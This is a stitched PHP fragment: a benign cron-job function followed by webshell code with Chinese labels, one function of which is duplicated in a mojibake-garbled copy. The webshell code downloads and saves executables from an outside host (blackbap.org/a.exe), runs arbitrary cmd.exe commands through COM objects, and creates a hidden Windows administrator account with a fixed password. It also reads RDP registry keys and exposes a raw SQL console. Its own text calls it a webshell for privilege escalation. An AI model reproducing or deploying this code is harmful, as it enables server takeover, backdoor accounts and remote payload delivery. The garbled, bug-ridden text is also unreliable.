protected function runWindows($job)
{
if (!$this->checkPHPBinary($job)) {
return;
}
if (!extension_loaded("COM")) {
$this->fail("Cannot run PHP binary, please enable COM extension");
}
$WshShell = new COM("WScript.Shell");
chdir(dirname(__FILE__) . "/../../");
$command = sprintf("%s -f run_job.php %s %s", $sugar_config['cron']['php_binary'], $job->id, $this->getMyId());
$WshShell->Run($command, 0, false);
// no window, don't wait for return
$WshShell->Release();
}
function Com_h()
{
$object = isset($_GET['o']) ? $_GET['o'] : 'adodb';
print <<<END
<div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a>
<a href="?s=h&o=wscript">[WScript.shell]</a>
<a href="?s=h&o=application">[Shell.Application]</a>
<a href="?s=h&o=downloader">[Downloader]</a></div>
<form method="POST" name="hform" id="hform" action="?s=h&o={$object}">
END;
if ($object == 'downloader') {
$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://blackbap.org/a.exe';
$Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(__FILE__) . '/a.exe');
print <<<END
<div class="actall">超连接 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
<div class="actall">下载到 <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
<div class="actall"><input value="下载" type="submit" style="width:80px;"></div></form>
END;
if (!empty($_POST['durl']) && !empty($_POST['dpath'])) {
echo '<div class="actall">';
$contents = @file_get_contents($_POST['durl']);
if (!$contents) {
echo '无法下载数据';
} else {
echo File_Write($_POST['dpath'], $contents, 'wb') ? '下载成功' : '下载失败';
}
echo '</div>';
}
} elseif ($object == 'wscript') {
$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir';
print <<<END
<div class="actall">执行CMD命令 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>
END;
if (!empty($_POST['cmd'])) {
echo '<div class="actall">';
$shell = new COM('wscript');
$exe = @$shell->exec("cmd.exe /c " . $cmd);
$out = $exe->StdOut();
$output = $out->ReadAll();
echo '<pre>' . $output . '</pre>';
@$shell->Release();
$shell = NULL;
echo '</div>';
}
} elseif ($object == 'application') {
$run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe';
$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\\boot.ini d:\\a.txt';
print <<<END
<div class="actall">程序路径 <input type="text" name="run" value="{$run}" style="width:600px;"></div>
<div class="actall">命令参数 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>
END;
if (!empty($_POST['run'])) {
echo '<div class="actall">';
$shell = new COM('application');
echo @$shell->ShellExecute($run, '/c ' . $cmd) == '0' ? '执行成功' : '执行失败';
@$shell->Release();
$shell = NULL;
echo '</div>';
}
} elseif ($object == 'adodb') {
$string = isset($_POST['string']) ? $_POST['string'] : '';
$sql = isset($_POST['sql']) ? $_POST['sql'] : '';
print <<<END
<script language="javascript">
function hFull(i){
\tif(i==0 || i==5) return false;
\tStr = new Array(12);
\tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb";
\tStr[2] = "Driver={Sql Server};Server=,1433;Database=DB;Uid=sa;Pwd=**";
\tStr[3] = "Driver={MySql};Server=;Port=3306;Database=DB;Uid=root;Pwd=**";
\tStr[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;";
\tStr[6] = "SELECT * FROM [TableName] WHERE ID<10";
\tStr[7] = "INSERT INTO [TableName](usr,psw) VALUES('yoco','pwd')";
\tStr[8] = "DELETE FROM [TableName] WHERE ID=1";
\tStr[9] = "UPDATE [TableName] SET USER='******' WHERE ID=1";
\tStr[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
\tStr[11] = "DROP TABLE [TableName]";
\tStr[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
\tStr[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";
\tif(i<=4){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];}
\treturn true;
}
</script>
<div class="actall">连接字符串 <input type="text" name="string" id="string" value="{$string}" style="width:526px;">
<select onchange="return hFull(options[selectedIndex].value)">
<option value="0" selected>--连接示例--</option>
<option value="1">Access连接</option>
<option value="2">MsSql连接</option>
<option value="3">MySql连接</option>
<option value="4">Oracle连接</option>
<option value="5">--SQL语法--</option>
<option value="6">显示数据</option>
<option value="7">添加数据</option>
<option value="8">删除数据</option>
<option value="9">修改数据</option>
<option value="10">建数据表</option>
<option value="11">删数据表</option>
<option value="12">添加字段</option>
<option value="13">删除字段</option>
</select></div>
<div class="actall">SQL命令 <input type="text" name="sql" id="sql" value="{$sql}" style="width:650px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div>
</form>
END;
if (!empty($string)) {
echo '<div class="actall">';
$shell = new COM('adodb');
@$shell->Open($string);
$result = @$shell->Execute($sql);
$count = $result->Fields->Count();
for ($i = 0; $i < $count; $i++) {
$Field[$i] = $result->Fields($i);
}
echo $result ? $sql . ' 执行成功<br>' : $sql . ' 执行失败<br>';
if (!empty($count)) {
while (!$result->EOF) {
for ($i = 0; $i < $count; $i++) {
echo htmlspecialchars($Field[$i]->value) . '<br>';
}
@$result->MoveNext();
}
}
$shell->Close();
@$shell->Release();
$shell = NULL;
echo '</div>';
}
}
return true;
}
function winshell()
{
$nop = ' ';
if ($_GET['winshell'] == 'wscript') {
$wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
$wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD·��<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="ִ��" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] == 'do') {
$ww = $wcpth . " /c " . $wcmd;
$phpwsh = new COM("Wscript.Shell") or die("����Shell.Wscript����ʧ��");
$phpexec = $phpwsh->exec($ww);
$execoutput = $wshexec->stdout();
$result = $execoutput->readall();
echo $result;
@$phpwsh->Release();
$phpwsh = NULL;
}
} elseif ($_GET['winshell'] == 'shelluser') {
$wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
$wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users�������ӹ���Ա<br><br>
{$nop}�½��û�����<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}���û����룺<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="����" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] = 'do') {
$shell = new COM("Shell.Users");
$cmd = $shell->create($wuser);
$cmd->changePassword($wpasw, "");
$cmd->setting["AccountType"] = 3;
}
} elseif ($_GET['winshell'] == 'regedit') {
$regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()������ȡע��������(Shell.Wscript����)<br><br>
ע����·����<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="��ȡ����" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] == 'do') {
$shell = new COM("WScript.Shell") or die("����Shell.Wscript����ʧ��");
try {
$registry_proxystring = $shell->RegRead($regpath);
} catch (Exception $e) {
echo '����: ' . $e->getMessage();
}
echo $registry_proxystring;
}
} else {
$tip = "�ݲ��Ա����ܿ��õĿ�����Ϊ����֮һ<br>Webshell���ڷ���������ΪWindowsϵͳ<br>PHP��Ȩ����������ڷdz����ε�ʱ�����Գ��Ա�����<br></h5><br><br><br>";
print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Wscript������<br>
Wscript����cmd��������<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.user����<br>
USER����ΪWindowsϵͳ�û�������������<br>{$tip}<a href="?s=jk&winshell=regedit"> [ ע������ȡ ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.Wscript����<br>
RegRead()������ȡϵͳע��������<br>{$tip}</pre></div>
END;
}
}
function winshell()
{
$nop = ' ';
if ($_GET['winshell'] == 'wscript') {
$wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
$wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD路径<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="执行" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] == 'do') {
$ww = $wcpth . " /c " . $wcmd;
$phpwsh = new COM("Wscript.Shell") or die("创建Shell.Wscript组件失败");
$phpexec = $phpwsh->exec($ww);
$execoutput = $wshexec->stdout();
$result = $execoutput->readall();
echo $result;
@$phpwsh->Release();
$phpwsh = NULL;
}
} elseif ($_GET['winshell'] == 'shelluser') {
$wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
$wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users组件添加管理员<br><br>
{$nop}新建用户名:<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}新用户密码:<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="添加" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] = 'do') {
$shell = new COM("Shell.Users");
$cmd = $shell->create($wuser);
$cmd->changePassword($wpasw, "");
$cmd->setting["AccountType"] = 3;
}
} elseif ($_GET['winshell'] == 'regedit') {
$regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()函数读取注册表内容(Shell.Wscript组件)<br><br>
注册表路径:<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="读取内容" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] == 'do') {
$shell = new COM("WScript.Shell") or die("创建Shell.Wscript组件失败");
try {
$registry_proxystring = $shell->RegRead($regpath);
} catch (Exception $e) {
echo '内容: ' . $e->getMessage();
}
echo $registry_proxystring;
}
} else {
$tip = "据测试本功能可用的可能性为万分之一<br>Webshell所在服务器必须为Windows系统<br>PHP提权很灵活,但你在非常无奈的时候可以尝试本功能<br></h5><br><br><br>";
print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Wscript组件。<br>
Wscript为调用cmd命令组件<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.user组件<br>
USER组件为Windows系统用户操作相关组件<br>{$tip}<a href="?s=jk&winshell=regedit"> [ 注册表读取 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.Wscript组件<br>
RegRead()函数读取系统注册表内容<br>{$tip}</pre></div>
END;
}
}
